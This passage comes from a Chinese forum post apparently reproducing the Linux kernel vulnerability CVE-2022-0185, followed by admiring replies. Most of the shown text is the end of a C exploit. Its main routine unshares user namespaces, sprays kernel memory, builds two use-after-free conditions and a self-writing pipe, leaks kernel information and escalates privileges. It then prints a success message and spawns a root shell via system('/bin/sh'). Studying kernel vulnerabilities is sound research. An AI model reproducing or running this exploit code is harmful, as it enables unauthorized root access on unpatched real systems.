    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}
int msg_pipe[2];
int main(void)
{   
    pipe(msg_pipe);
    bind_cpu(0);

    if(!fork()){
        unshare(CLONE_NEWNS | CLONE_NEWUSER);
        occupy_4k_obj_by_msg();sleep(1);
        construct_first_uaf();sleep(1);
        construct_second_uaf();sleep(1);
        build_self_writing_pipe();sleep(1);
        info_leaking_by_arbitrary_pipe();sleep(1);
        priviledge_escalation();
        write(msg_pipe[1], "peiwithhao", 10);
        sleep(114514);
        return 0;
    }else{
        if(prctl(PR_SET_NAME, "PEIWITHHAO") < 0){
            error_log("failed to prctl!");
        }
        char ch;
        read(msg_pipe[0], &ch, 1);
    }
    get_root_shell();
}

参考文章

hy8051hy · 发表于 2023-10-12 07:41

谢谢楼主的分享!这个绝对要顶！！！

h888866j · 发表于 2023-10-12 08:34

好长啊，写了多久

Airey · 发表于 2023-10-12 08:42

师傅太强了，感谢分享

wang180 · 发表于 2023-10-12 09:39

感谢分享

zhaoyf18 · 发表于 2023-10-12 11:06

太强了！

TL1ng · 发表于 2023-10-12 13:12

谢谢指导

高苗苗 · 发表于 2023-10-13 11:21

对于你们这些大牛我是很佩服的

ytdzjun · 发表于 2023-10-13 16:28

无言的佩服~

mcby · 发表于 2023-10-13 19:24

大佬牛皮

帐号		自动登录	找回密码
密码			注册[Register]

[漏洞分析] 【Linux kernel 漏洞复现】CVE-2022-0185